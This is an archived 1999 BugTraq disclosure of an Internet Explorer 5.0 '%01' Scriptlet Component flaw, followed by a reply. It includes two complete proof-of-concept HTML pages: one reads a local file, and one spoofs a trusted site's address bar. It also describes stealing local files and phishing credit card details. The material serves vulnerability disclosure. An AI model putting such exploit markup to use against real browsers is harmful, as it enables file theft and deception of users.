Date: Fri, 9 Apr 1999 07:15:12 +0300 From: Georgi Guninski <joro@NAT.BG> To: BUGTRAQ@netspace.org Subject: IE 5.0 security vulnerabilities - %01 bug again There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes. This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January. The problem seems to be in the "Microsoft Scriptlet Component". If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'. Some of the vulnerabilities are: 1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available at: http://www.nat.bg/~joro/scriptlet.html 2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available at: http://www.nat.bg/~joro/scrspoof.html Workaround: Disable Javascript Regards, Georgi Guninski ---------------------------------------------------------------------------------- [http://www.nat.bg/~joro/scriptlet.html] <HTML> <HEAD> <TITLE> IE 5.0 "%01" security vulnerability - file reading </TITLE> </HEAD> <BODY> There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes. <BR> This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January. <BR> The problem seems to be in the "Microsoft Scriptlet Component". If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'. This page demonstrates reading local files. <BR> Workaround: Disable Javascript <BR> <A HREF="javascript:if(confirm('http://www.nat.bg/~joro \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://www.nat.bg/~joro'" tppabs="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A> <OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" > <PARAM NAME="URL" value="a tppabs="http://www.packetstormsecurity.nl/opensec-exploits/exploits/netapps/web-cgi/browser/a"bout:<SCRIPT>alert('Create a short file C:\\test.txt and it will be read and shown in a message box');a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();</SCRIPT>%01file://c:/"> </OBJECT> </BODY> </HTML> ---------------------------------------------------------------------------------- [http://www.nat.bg/~joro/scrspoof.html] <HTML> <HEAD> <TITLE> IE 5.0 "%01" security vulnerability - window spoofing </TITLE> </HEAD> <BODY> There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes. <BR> This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January. <BR> The problem seems to be in the "Microsoft Scriptlet Component". If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'. This page demonstrates spoofing windows. <BR> Workaround: Disable Javascript <BR> <A HREF="javascript:if(confirm('http://www.nat.bg/~joro \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://www.nat.bg/~joro'" tppabs="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A> <OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" > <PARAM NAME="URL" value="a tppabs="http://www.packetstormsecurity.nl/opensec-exploits/exploits/netapps/web-cgi/browser/a"bout:<SCRIPT>a=window.open('http://www.yahoo.com/');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF="javascript:if(confirm('http://www.nat.bg/~joro \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://www.nat.bg/~joro'" tppabs="http://www.nat.bg/~joro">Go to Georgi Guninski home page</A></H1></BODY></HTML>');</SCRIPT>%01http://www.yahoo.com"> </OBJECT> </BODY> </HTML> ---------------------------------------------------------------------------------- Date: Fri, 9 Apr 1999 08:38:09 -0400 From: Eric Stevens <ejsteven@CS.MILLERSV.EDU> To: BUGTRAQ@netspace.org Subject: Re: IE 5.0 security vulnerabilities - %01 bug again Is there any way to exploit this with files that are not recognized as text. Example, I tried modifying your code to c:\autoexec.bat and c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat file, I instead recieved an Open/Save As dialog. Open tries to execute the bat file or edit the ini file in the temp folder where it was downloaded, and save as does the obvious. This problem exists on both versions of IE5 that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be exploited against anything but text files as it's not terribly likely that you have any sensitive information sitting around in text files whose names are likely to be guessed. ----] quote [---- >1) IE allows reading local files and sending them to an arbitrary >server. >The filename must be known. > >The bug may be exploited using HTML mail message. > ----] end quote [----
zorazelda